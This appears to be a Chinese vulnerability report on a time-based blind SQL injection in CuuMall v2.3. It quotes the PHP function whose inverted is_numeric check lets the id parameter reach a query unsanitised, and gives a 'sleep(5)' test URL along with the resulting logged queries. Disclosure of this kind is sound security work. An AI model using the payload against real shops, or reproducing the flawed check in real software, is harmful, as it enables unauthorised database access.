### 简要描述:
CuuMall 最新版本sql注入一枚
### 详细说明:
感觉 CuuMall 的官网文件是不是被人改动了 还是本身就是个bug,不多说了 直接看代码
DetailsAction.class.php(282-313)
```
public function add_pru( )
{
$coo = new Cookie( );
if ( $coo->is_set( c( "GUESTCOOK" )."mall-m-name" ) )
{
$this->assign( "waitSceond", 3 );
$this->assign( "jumpUrl", "__APP__/Home/login" );
$this->error( "请登录后收藏商品" );
exit( );
}
$id = $_GET['id'];
if ( is_numeric( $id ) )
{
$this->assign( "waitSceond", 3 );
$this->assign( "jumpUrl", "__APP__" );
$this->error( "非法参数" );
exit( );
}
$addpru = new Model( "m_add" );
$d_addpru = $addpru->where( "pruid=".$id )->find( );
if ( empty( $d_addpru ) )
{
```
这里 居然判断为是一个数字类型那么就非法参数,按照正常逻辑这里应该是非数字啊
结果导致
$d_addpru = $addpru->where( "pruid=".$id )->find( );盲注了
访问url:
192.168.10.70/cuumall_v2.3/v2.3/mall_upload/index.php/home/detail/index/id/2 and sleep(5)#
延时响应即可!!!
查看后台抓的数据库sql
2014/9/30 10:37 SELECT * FROM `cuu_sell_id` WHERE pro_id=1 and sleep(5)
2014/9/30 10:37 SELECT * FROM `cuu_pl_id` WHERE pro_id=1 and sleep(5)
一大堆这样的sleep
### 漏洞证明:
京公网安备 11010502034610号
暂无评论